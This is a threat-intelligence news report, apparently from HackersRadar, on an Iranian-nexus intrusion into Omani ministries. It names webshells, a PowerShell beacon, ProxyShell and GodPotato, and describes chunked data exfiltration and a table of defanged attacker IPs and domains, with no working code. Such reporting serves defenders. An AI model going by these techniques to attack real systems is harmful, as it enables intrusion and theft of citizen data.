Iranian-Nexus Targets Oman Ministries: Webshells & Data
A sophisticated cyber operation, attributed to an Iranian-nexus threat actor, has infiltrated at least 12 Omani government ministries. This stealthy campaign has resulted in the theft of tens of...
A sophisticated cyber operation, attributed to an Iranian-nexus threat actor, has infiltrated at least 12 Omani government ministries. This stealthy campaign has resulted in the theft of tens of thousands of citizen records and established persistent backdoors within the compromised systems
The intrusion came to light when a staging server at 172.86.76[.]127, hosted on a VPS in the United Arab Emirates, was found with its directory wide open.
The entire toolkit, command and control code, session logs, and stolen data were all visible. The primary confirmed target was the Ministry of Justice and Legal Affairs, showing signs of active compromise as recently as April 10, 2026.
Analysts at Hunt.io identified the exposed server and documented the full scope of the operation, including the tools used, targets hit, and data stolen.
Their research points to a campaign consistent with Iranian state-sponsored activity, with overlaps seen in past operations linked to Iran’s Ministry of Intelligence and Security.
Oman has been targeted by Iranian-aligned hackers before. In 2025, a separate group compromised a mailbox at Oman’s Ministry of Foreign Affairs and used it to send phishing emails to embassies globally.
This latest campaign follows a similar direction, with a sharper focus on judicial records, immigration data, and citizen identity information.
Over 26,000 Ministry of Justice user records were pulled from the environment, along with judicial case data, committee decisions, and Windows registry hives containing internal credentials. A README file on the server labeled the machine as “VPS C2,” suggesting it was just one node within a larger, still-unidentified infrastructure.
Webshells, SQL Escalation, and a Wide Target Scope
Two webshells were central to this attack. The first, hc2.aspx, was recovered directly from the C2 server. The second, health_check_t.aspx, appeared hardcoded across every attack script targeting the Ministry of Justice network.
Commands were passed through a simple parameter, executed via Windows command processes, and output was returned as plain text to the attacker.
A dedicated folder on the server held 12 exploit scripts built for Omani government targets, covering Exchange email spraying, SQL server escalation, and memory-based execution designed to avoid writing files to disk.
Targets across 12 entities included the Royal Oman Police, Tax Authority, Civil Aviation Authority, Ministry of Finance, and the Office of Public Prosecution. Techniques ranged from ProxyShell exploitation to credential brute-forcing. The attacker also deployed GodPotato, a Windows privilege escalation tool, once inside the network.
Command Infrastructure and Iranian Nexus Ties
The C2 system ran on a Python HTTP server paired with a PowerShell beacon installed on the victim machine. The beacon checked in every 30 seconds, returning the victim’s domain, username, and hostname at the start of each session.
Stolen data was sent back in small encoded chunks to avoid triggering URL length limits. Logs confirm the active session on April 10, 2026 began at 03:00 UTC, with all traffic traced to the Ministry of Justice network.
A neighboring cluster of domains on the same hosting network included a replica of a Persian-language diaspora media site and pages tied to censorship circumvention tools, patterns linked to Iranian state operations in the past.
Tooling overlaps with known Iranian-nexus groups APT34 and MuddyWater, both of which have targeted Middle Eastern governments using similar methods. Hunt.io stopped short of formal group attribution but placed the activity within the broader Iranian state-nexus space.
Monitoring exposed infrastructure in the window between attacker setup and cleanup remains one of the most practical ways to catch an active intrusion before critical data walks out the door.
IoCs:-
| IP Address | Resolving Domain(s) | Hosting Provider |
|---|---|---|
| 172.86.76[.]101 | dubai-1.vaermb[.]com, regorixa[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]94 | dubai-2.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]108 | dubai-3.vaermb[.]com, myjitsi.exceptionnotfound[.]ir | RouterHosting LLC, UAE |
| 172.86.76[.]112 | dubai-4.vaermb[.]com, s5.sideliner[.]ir | RouterHosting LLC, UAE |
| 172.86.76[.]120 | dubai-5.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]121 | dubai-6.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]124 | dubai-7.vaermb[.]com, suanefllix[.]com, brnettlix[.]com, brttfrixx[.]com, realprimefix[.]com, identificara[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]127 | dubai-10.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]129 | dubai-8.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]130 | dubai-9.vaermb[.]com | RouterHosting LLC, UAE |
| 45.59.114[.]60 | shop.exceptionnotfound[.]ir, price.exceptionnotfound[.]ir, myjitsi.mrnajafipour[.]ir | RouterHosting LLC, CH |
| 104.21.27[.]95 | tools.exceptionnotfound[.]ir | Cloudflare |
| 172.67.142[.]35 | tools.exceptionnotfound[.]ir | Cloudflare |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
No Comment! Be the first one.